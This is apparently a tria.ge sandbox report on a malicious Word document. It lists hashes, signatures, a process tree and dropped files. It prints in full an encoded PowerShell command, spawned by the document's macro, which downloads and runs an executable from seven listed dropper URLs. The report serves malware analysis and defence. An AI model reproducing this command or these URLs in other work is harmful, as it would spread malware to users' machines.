Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    29/05/2024, 01:21

General

  • Target

    sample.doc

  • Size

    157KB

  • MD5

    ea5e4e1ad657db4cce957caff92d4995

  • SHA1

    42fc1e473f121eea1fd3aea54f5fb9f9a15c5157

  • SHA256

    e13fe582fb3f540b7bae68b1aab1cdc1f9e872dffc0f73bc14f04287c66cc813

  • SHA512

    f61d28436026638cc9b740fce172ffbbf61064e0916f2d4aa843f30c4de3be75ff8344128b9bcbb143815dffa005f4092ff0ba0ec3396a7ddbeff3b4291c9e68

  • SSDEEP

    1536:A2Fj72Fjmrdi1Ir77zOH98Wj2gpngh+a9ClJinv:1rfrzOH98ipg4Ynv

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://case.gonukkad.com/sys-cache/CjT/

exe.dropper

https://starrcoin.net/wp-admin/YT/

exe.dropper

http://modelaw.devkind.com.au/wp-admin/cvDRmGK/

exe.dropper

http://dprkp.palembang.go.id/sys-cache/7Y4aHw/

exe.dropper

http://completeguideblogging.com/euiot/PAuJG/

exe.dropper

http://qutiche.cn/wp-admin/Q/

exe.dropper

https://shiva-engineering.com/1cj/tKemHV7/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\sample.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1868
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1604
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABVADkAcABmAHcAeQBqAD0AKAAoACcAQgA2ACcAKwAnAF8AJwApACsAKAAnAG8AOABfACcAKwAnAHAAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABlAE4AVgA6AHUAUwBlAHIAUABSAG8ARgBJAEwAZQBcAEsAWABmAEUARAAxADQAXABEAFMANQA4ADMAUgBoAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQASQByAEUAYwB0AE8AUgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBDAHUAUgBgAGkAYABUAHkAUAByAG8AdABPAGMATwBMACIAIAA9ACAAKAAoACcAdAAnACsAJwBsAHMAMQAnACkAKwAoACcAMgAsACcAKwAnACAAdABsAHMAJwArACcAMQAxACcAKQArACgAJwAsACAAJwArACcAdAAnACkAKwAnAGwAJwArACcAcwAnACkAOwAkAFMAYQBrAGYAegBuAHoAIAA9ACAAKAAoACcAVQAnACsAJwBpADAAaQAnACkAKwAoACcANgBtACcAKwAnADYAJwApACkAOwAkAEkAbwBqAGgAMgBqAGEAPQAoACgAJwBWAF8AJwArACcAbgAzADAAdAAnACkAKwAnAHUAJwApADsAJABNAGYAagBuAHoAdQBmAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnADkAJwArACgAJwBLAGsASwB4ACcAKwAnAGYAZQBkACcAKwAnADEANAA5AEsAawBEAHMAJwApACsAJwA1ADgAJwArACgAJwAzAHIAJwArACcAaAA5AEsAJwArACcAawAnACkAKQAgAC0AcgBlAFAAbABBAGMAZQAgACgAJwA5ACcAKwAnAEsAawAnACkALABbAEMASABBAFIAXQA5ADIAKQArACQAUwBhAGsAZgB6AG4AegArACgAJwAuACcAKwAoACcAZQB4ACcAKwAnAGUAJwApACkAOwAkAEsAdwBjAGkAMgBvADkAPQAoACcAQgB0ACcAKwAoACcAZQAnACsAJwB1AHQAMABxACcAKQApADsAJABIAGoAOAA3AGwANgBiAD0ALgAoACcAbgBlACcAKwAnAHcALQAnACsAJwBvAGIAagBlAGMAdAAnACkAIABuAEUAVAAuAHcARQBCAGMATABJAEUAbgB0ADsAJABEAGkAeAB6AG8AZwBlAD0AKAAoACcAaAB0AHQAJwArACcAcAAnACkAKwAnAHMAJwArACgAJwA6AC8ALwBjACcAKwAnAGEAJwArACcAcwAnACkAKwAoACcAZQAuAGcAJwArACcAbwAnACkAKwAoACcAbgAnACsAJwB1AGsAawBhAGQALgBjACcAKQArACcAbwBtACcAKwAnAC8AJwArACcAcwAnACsAKAAnAHkAcwAnACsAJwAtAGMAYQAnACkAKwAoACcAYwBoAGUALwAnACsAJwBDACcAKQArACgAJwBqACcAKwAnAFQALwAqAGgAJwApACsAJwB0AHQAJwArACcAcAAnACsAJwBzADoAJwArACgAJwAvAC8AcwAnACsAJwB0AGEAcgAnACsAJwByAGMAbwAnACsAJwBpAG4ALgAnACsAJwBuACcAKQArACcAZQAnACsAKAAnAHQALwAnACsAJwB3AHAALQBhAGQAbQBpAG4AJwArACcALwBZACcAKwAnAFQALwAqAGgAdAAnACsAJwB0ACcAKwAnAHAAOgAvACcAKQArACgAJwAvACcAKwAnAG0AbwBkAGUAbABhAHcAJwArACcALgBkACcAKwAnAGUAdgAnACkAKwAoACcAawBpACcAKwAnAG4AZAAnACkAKwAoACcALgBjACcAKwAnAG8AbQAuACcAKQArACgAJwBhAHUAJwArACcALwB3ACcAKQArACgAJwBwAC0AJwArACcAYQBkACcAKQArACgAJwBtAGkAJwArACcAbgAnACsAJwAvAGMAJwArACcAdgBEACcAKwAnAFIAbQBHAEsALwAqACcAKwAnAGgAdAB0AHAAOgAvACcAKwAnAC8AJwArACcAZABwAHIAawBwAC4AJwArACcAcAAnACkAKwAnAGEAbAAnACsAKAAnAGUAbQBiAGEAbgAnACsAJwBnACcAKQArACcALgAnACsAJwBnACcAKwAoACcAbwAuACcAKwAnAGkAZAAvAHMAeQBzAC0AJwArACcAYwBhACcAKwAnAGMAJwApACsAKAAnAGgAZQAvADcAJwArACcAWQA0AGEAJwApACsAKAAnAEgAJwArACcAdwAvACoAaAAnACsAJwB0AHQAcAAnACkAKwAoACcAOgAnACsAJwAvAC8AYwAnACkAKwAnAG8AJwArACgAJwBtACcAKwAnAHAAbABlAHQAZQBnACcAKQArACgAJwB1ACcAKwAnAGkAZABlAGIAJwApACsAJwBsACcAKwAnAG8AZwAnACsAJwBnACcAKwAoACcAaQBuACcAKwAnAGcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBlAHUAaQBvAHQAJwApACsAKAAnAC8AUABBACcAKwAnAHUASgBHACcAKQArACcALwAqACcAKwAoACcAaAB0AHQAJwArACcAcAA6AC8AJwApACsAKAAnAC8AcQAnACsAJwB1AHQAaQAnACsAJwBjAGgAZQAnACkAKwAoACcALgBjACcAKwAnAG4AJwApACsAKAAnAC8AdwBwACcAKwAnAC0AJwApACsAJwBhACcAKwAnAGQAJwArACcAbQAnACsAKAAnAGkAbgAnACsAJwAvACcAKQArACgAJwBRAC8AJwArACcAKgBoAHQAJwArACcAdABwAHMAOgAvAC8AcwAnACkAKwAoACcAaABpAHYAYQAtACcAKwAnAGUAbgAnACsAJwBnAGkAbgBlACcAKwAnAGUAcgAnACsAJwBpAG4AJwArACcAZwAuAGMAbwBtACcAKwAnAC8AMQBjACcAKwAnAGoALwB0AEsAJwArACcAZQAnACkAKwAoACcAbQBIACcAKwAnAFYAJwApACsAJwA3AC8AJwApAC4AIgBTAGAAcABMAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEMAeQA1AGgAcABiADQAPQAoACcAVwAxACcAKwAoACcAdgA5ACcAKwAnAHgAJwApACsAJwB5AGwAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAUQByAG8AbQA2AGEAcgAgAGkAbgAgACQARABpAHgAegBvAGcAZQApAHsAdAByAHkAewAkAEgAagA4ADcAbAA2AGIALgAiAGQAYABPAFcAbgBMAG8AQQBgAEQARgBgAEkATABlACIAKAAkAFEAcgBvAG0ANgBhAHIALAAgACQATQBmAGoAbgB6AHUAZgApADsAJABSAGgANQBpAGsAeABfAD0AKAAnAE0AZQAnACsAKAAnAGUAaABmAHEAJwArACcAMQAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABNAGYAagBuAHoAdQBmACkALgAiAGwARQBgAE4AYABnAHQAaAAiACAALQBnAGUAIAAzADYAOQAzADEAKQAgAHsAJgAoACcASQBuAHYAbwBrACcAKwAnAGUAJwArACcALQBJAHQAJwArACcAZQBtACcAKQAoACQATQBmAGoAbgB6AHUAZgApADsAJABYAHoAawB6AG0AbQBuAD0AKAAoACcARwAnACsAJwBuAGEANQAnACkAKwAnAF8AJwArACcAcwBwACcAKQA7AGIAcgBlAGEAawA7ACQAVwA3AGwAZgBoAGcAcQA9ACgAKAAnAFcAMgBrACcAKwAnADgAdwB5ACcAKQArACcAcAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFMAcAAxAF8AYQB1AG0APQAoACcATQAnACsAKAAnAHEAYgBqAF8AJwArACcAZQByACcAKQApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2956

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    • C:\Users\Admin\AppData\Local\Temp\Tar3D36.tmp

      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      59d70fab5b57917cd9a7bff0ded5cfcb

      SHA1

      0447fca47bac76ea1af4f59ea5f5ecf800e180ef

      SHA256

      b4b76132192d2e2ed935d55c8bcd16ca8ce3ce48d4748e08f73821486d3c4905

      SHA512

      b6a532f8e1fadced797d937b03820c2083f04014bb33b4814839cfaa43279f42c6fc0f195b3938e56136e1f6746db907e462fb909ef2d81588a1d5dadf0ba47a

    • memory/1868-26-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-25-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-8-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-9-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-17-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-24-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-16-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-14-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-13-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-12-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-11-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-10-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-18-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-22-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-21-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-20-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-19-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-0-0x000000002FEC1000-0x000000002FEC2000-memory.dmp

      Filesize

      4KB

    • memory/1868-7-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-27-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-15-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-23-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-31-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-32-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-30-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-29-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-28-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-33-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-103-0x000000007165D000-0x0000000071668000-memory.dmp

      Filesize

      44KB

    • memory/1868-102-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1868-46-0x000000007165D000-0x0000000071668000-memory.dmp

      Filesize

      44KB

    • memory/1868-6-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-2-0x000000007165D000-0x0000000071668000-memory.dmp

      Filesize

      44KB

    • memory/1868-86-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/1868-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2956-40-0x0000000002070000-0x0000000002078000-memory.dmp

      Filesize

      32KB

    • memory/2956-39-0x000000001B690000-0x000000001B972000-memory.dmp

      Filesize

      2.9MB